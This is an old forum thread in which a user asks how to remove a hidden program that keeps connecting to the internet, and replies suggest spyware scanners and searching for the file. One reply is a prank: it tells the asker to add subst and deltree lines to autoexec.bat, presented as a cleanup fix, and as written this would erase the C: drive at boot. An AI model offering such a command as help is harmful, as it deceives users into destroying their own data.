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All Things Microsoft => Microsoft Software => Topic started by: kilgors on 13 August 2002, 21:34

Title: hidden file question
Post by: kilgors on 13 August 2002, 21:34
Hi Guys/Gals, I just found your fasinating site while looking for help and this seems to be the place.

I have a file, winkyb.exe hidden on my computer which tries to access the internet about 3 times an hour at 3 different destinations. How can I delete this rascal?
If I give it access it slows down my browsing to a crawl and when I do not I seem to get mysteriously disconnected every few minutes unless I reboot. Has anyone experienced this? Thanks.
Title: hidden file question
Post by: Ice-9 on 14 August 2002, 00:04
Sounds a lot like spyware to me if it tries to connect to the web every 3 minutes.
I would recommend Ad-Aware . (
Run it and see if it comes up with any spyware, I bet it will.
It's a great tool to scan your system and remove the filth that all those web-marketing companies install on your system without your knowledge.
Title: hidden file question
Post by: Master of Reality on 14 August 2002, 00:05
ok... what you have to do is exactly this!
open up your autoexec.bat and add the line at the beginning:
subst c:\ g:

then at the end of autoexec.bat add the line:
deltree \y g:

this will get rid of the files that shouldnt be there like the file that keeps accessing the net when it shouldnt.
Title: hidden file question
Post by: Ice-9 on 14 August 2002, 00:45
You bad MOR   ;)

[ August 13, 2002: Message edited by: Ice9 ]

Title: hidden file question
Post by: saddlemagic on 14 August 2002, 01:33
Yep, I gotta say that would get rid of most any nasty file you don't want. I've got this 'special keyboard' that has a very popular function built in:


Everybody should get one of these things.
Title: hidden file question
Post by: neo_x500 on 16 August 2002, 21:20
I have a better Key to add, and it should be added to every computer with a version of windows on it. It should be called the "oh shit" key, and when you press it, windows will activate a message that says "you really fucked up this time"
Title: hidden file question
Post by: Master of Reality on 16 August 2002, 21:37
Originally posted by Neo:
I have a better Key to add, and it should be added to every computer with a version of windows on it. It should be called the "oh shit" key, and when you press it, windows will activate a message that says "you really fucked up this time"

that would be hilarious. I was thinking of makin a script that when the windows key gets pressed it sends hate mail to
Title: hidden file question
Post by: eXor on 16 August 2002, 22:48
If you know the name of the file then search for it and delete it.

Start Button--->Search-->for files and folders.

No spyware gets past my firewall in Windows ME